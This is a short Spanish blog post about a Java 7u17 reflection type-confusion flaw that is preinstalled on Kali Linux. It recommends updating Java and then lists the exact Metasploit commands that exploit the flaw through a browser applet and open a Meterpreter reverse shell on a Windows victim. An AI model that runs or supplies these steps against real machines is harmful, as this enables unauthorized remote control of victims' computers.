Bug en java que viene con Kali linux

Nuevamente le toca a java, de 0day en otro, java no puede tocar piso, y esta vez le toca a la version 7u17, casualmente es la que viene instalada en Kali linux por defecto, como ya mostre en el post » Que hacer despues de instalar Kali linux » la solucion a este problema es actualizar a una version mas reciente de java.

Pero ahora vamos a lo importante:

Este bug fue descubierta por Jeroen Frijters que la publicó el 17-04-2013, recientemente (el 20-04-2013) Metasploit a proporcionado un módulo que explota dicha vulnerabilidad.

El módulo abusa del Java Reflection generando una Type Confusion, debido a un débil control de acceso al establecer campos finales sobre las clases estáticas, ejecutando así código fuera del Sandbox de Java. Este exploit no bypasea el click-to-play de Java, por lo cual la víctima debe aceptar la advertencia que dice que se puede ejecutar un Applet malicioso en Java.

Aquí les dejo un video con la explotación con Metasploit:

Los comandos de metasploit son:

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo